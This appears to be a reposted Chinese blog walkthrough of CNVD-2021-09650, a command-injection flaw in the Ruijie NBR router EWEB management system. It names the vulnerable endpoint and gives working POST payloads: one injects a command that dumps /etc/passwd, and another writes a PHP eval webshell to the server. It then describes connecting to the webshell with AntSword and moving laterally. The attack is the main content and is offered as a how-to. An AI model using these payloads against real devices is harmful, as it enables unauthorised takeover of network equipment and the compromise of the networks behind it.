锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell
Posted BeeN & CCPX
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell相关的知识,希望对你有一定的参考价值。
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell
漏洞编号:
CNVD-2021-09650
漏洞描述:锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执行获取
漏洞影响:
锐捷NBR路由器 EWEB网关系统
漏洞复现:
首先打开网关系统
然后在URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。
我们打开hacker Bar,在Post data 输入 mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt
这句代码的意思是使用cat 查看/etc/passwd路径下的passwd 文件,并将内容保存到test.txt
接着我们访问url/test.txt 路径,查看文件。
回显了/etc/passwd路径下passwd文件的内容
利用漏洞文件文件上传。
利用此漏洞我们可以将一句话木马写入sorry.php文件,然后用蚁剑来连接webshell.
漏洞复现:
Payload :
mac=1&ip=127.0.0.1|echo ‘<?php @eval($_POST[‘bb’]) ?>’ > sorry.php
将这句话execute一下。
然后我们直接上蚁剑连接就ok了
这边直接能看到我们上传的webshell
右击终端
然后就可以进一步的横向或者纵向,也可以进一步信息收集。
博客来之不易,还望各位大佬点赞关注,谢谢!
想找安全岗位私信内推哦!
以上是关于锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell的主要内容,如果未能解决你的问题,请参考以下文章